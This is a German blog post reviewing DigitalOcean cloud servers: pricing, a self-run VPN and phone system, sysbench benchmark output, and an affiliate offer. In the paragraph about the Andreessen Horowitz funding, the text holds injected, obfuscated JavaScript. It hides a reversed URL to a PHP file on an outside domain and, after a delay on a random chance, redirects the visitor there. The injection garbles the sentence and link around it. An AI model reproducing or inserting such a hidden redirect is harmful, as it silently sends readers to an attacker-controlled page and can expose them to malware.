Die Eier legende Wollmilchsau. Virtuelle VPN Server von Digital Ocean für nur 0,007 $

Digital Ocean ist ein Anbieter für Cloud Server, die binnen weniger Sekunden deployed sind. Zum Einsatz kommen dabei SSDs. Für 0,007 $ die Stunde gibt es 512MB RAM, 1TB Transfer (wobei der derzeit nicht berechnet wird) sowie 20 GB Platten Speicher. Will man nur kurz was testen, dann kann man problemlos und schnell ein sogenanntes Droplet erstellen. So errechnet sich ein Höchstbetrag von etwa 3,50 Euro im Monat wenn man den Server rund um die Uhr laufen lässt…

Ich habe diese Cloud Server jetzt mehrere Monate getestet und finde sie genial.
so ein sogenanntes Droplet steht innerhalb von nur 55 Sekunden. Es gibt eine breite Palette von Betriebssystemen zur Auswahl sowie fertig vorkonfigurierte Komplettlösungen..

Seit rund zwei Monaten läuft dort ein VPN-Server. Durch die Holland-IP, wobei Google mich auch gelegentlich in Russland zu finden meint, kann man natürlich auch YouTube-Videos schauen, die in Deutschland aufgrund der nach wie vor fehlenden Vereinbarung zwischen Google und der GEMA nicht verfügbar sein. Da ich mir jedoch zum einen nicht zutraue das absolut sicher zu fahren (mir fehlen dazu einfach die Fachkenntnisse und der professionelle Background, den Hide.me mitbringt. nehme ich den V-Server aber in der Regel als Client und tunnel mich zusätzlich mit dem V-Server nach Hide.me durch.

Man hat da 2 Möglichkeiten um es mit einem Beispiel zu erörtern:
Entweder man leitet alles über den VPN oder man routet bestimmte IP bzw. IP-Ranges über den VPN.
http://superuser.com/questions/457020/openvpn-only-route-a-specific-ip-addresses-through-vpn

Der andere Vorteil von Digital Ocean liegt darin das sich meine Telefonanlage dorthin ausgelagert habe und somit seit 2 Monaten die gesamte international verstreute Familie (20 Telefone inklusive Smartphones und Tabletts quasi kostenfrei telefonieren kann). Zusätzlich wurde ein WordPress Blog begonnen (Tocan.de).

Ein eigener DNS Server und ein Mailserver sind in Planung.
Die jüngste Geschichte von Digital Ocean liest sich wie ein Märchenbuch für Finanzjunkies. Als ich selbst im März 2014 dort angemeldet habe lag das unter anderem an einer Meldung in den $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andreessen-horowitz/“ target=“_blank“ rel=“nofollow“ data-proxy-href=“proxy.php?link=http%3A%2F%2Ftechcrunch.com%2F2014%2F03%2F06%2Fdigitalocean-raises-37-million-from-andreessen-horowitz%2F&hash=0e0421dcea77c414feb7a742643f5270″>TechCrunch News dass Andreessen Horowitz dort mit 37,2 Millionen $ dort eingestiegen ist.

Einen Server 55 Sekunden aufzusetzen ist mit DigitalOcean ein Kinderspiel was selbst eingefleischte Windows Nutzer hinbekommen sollten.

Als erstes wählt man „Create a Droplet“

Man gibt den Hostnamen an z.b. Datenwolke-1

und wählt die Größe aus.

Dann wählt man das Rechenzentrum aus wo der Server plaziert werden soll
An Betriebssystemen gibt es eine große Auswahl
Create Droplet
Fertig

Eine gute Auswahl an „OneClick“ Installationen rundet das Paket ab.

Ideal um etwas zu testen. Wer Bedenken hat der VPN Provider loggt mit, schleift diesen einfach mit Hilfe des Droplets durch. Ist man fertig, zerstört man das Droplet einfach. Wo kein Rechner (weil zerstört) da auch keine Logdaten.

Die Benchmarks sprechen für sich:

CPU Performance Benchmark

Maximum prime number checked in CPU test: 20000

Test execution summary:
total time: 35.3304s
total number of events: 10000
total time taken by event execution: 35.3222
per-request statistics:
min: 3.33ms
avg: 3.53ms
max: 36.82ms
approx. 95 percentile: 3.61ms

Threads fairness:
events (avg/stddev): 10000.0000/0.00
execution time (avg/stddev): 35.3222/0.00

File IO Benchmark

Extra file open flags: 0
128 files, 160Mb each
20Gb total file size

Operations performed: 1107540 Read, 738360 Write, 2362632 Other = 4208532 Total
Read 16.9Gb Written 11.266Gb Total transferred 28.166Gb (96.14Mb/sec)
6152.98 Requests/sec executed

Test execution summary:
total time: 300.0011s
total number of events: 1845900
total time taken by event execution: 188.3251
per-request statistics:
min: 0.01ms
avg: 0.10ms
max: 64.28ms
approx. 95 percentile: 0.19ms

Threads fairness:
events (avg/stddev): 1845900.0000/0.00
execution time (avg/stddev): 188.3251/0.00

MySQL Benchmark

OLTP test statistics:
queries performed:
read: 414708
write: 0
other: 59244
total: 473952
transactions: 29622 (493.65 per sec.)
deadlocks: 0 (0.00 per sec.)
read/write requests: 414708 (6911.03 per sec.)
other operations: 59244 (987.29 per sec.)

Test execution summary:
total time: 60.0067s
total number of events: 29622
total time taken by event execution: 479.8497
per-request statistics:
min: 2.39ms
avg: 16.20ms
max: 110.20ms
approx. 95 percentile: 25.25ms

Threads fairness:
events (avg/std dev): 3702.7500/11.69
execution time (avg/stddev): 59.9812/0.00

Wer über den Affilate Code geht und mich vorher informiert, dem kann ich einen Promocode zusenden mit dem man wenn man für 10 $ bucht, zusätzlich 10 $ gutgeschrieben bekommt. Wenn alles klappt dem sende ich einen UART TTL Adapter zu mit dem ihr euren Router wieder ins Leben rufen könnt. Bitte vorher anfragen damit ich auch welche da habe.

Wer sich die Community Seiten auf Digital Ocean mal ansieht wird begeistert sein wie Developer dort Probleme lösen und nützliche Tutorials schreiben.

Wer Lust hat kan dieses natürlich auch hier in der Diskussion vorstellen.

Ich gebe mal ein Beispiel:

Daniela Tocan on BehanceDaniela Tocan on BloggerDaniela Tocan on EmailDaniela Tocan on FacebookDaniela Tocan on GoogleDaniela Tocan on TwitterDaniela Tocan on WordpressDaniela Tocan on Youtube
Daniela Tocan
Hi, ich bin Daniela, Inhaberin von Tocan Medizintechnik, chirurgische instrumente zur Zweckentfremdung. Die Webseite Tocan.de soll den Servicegedanken der Firma hervorheben. Service und Support sind die tragenden Säulen der Firma.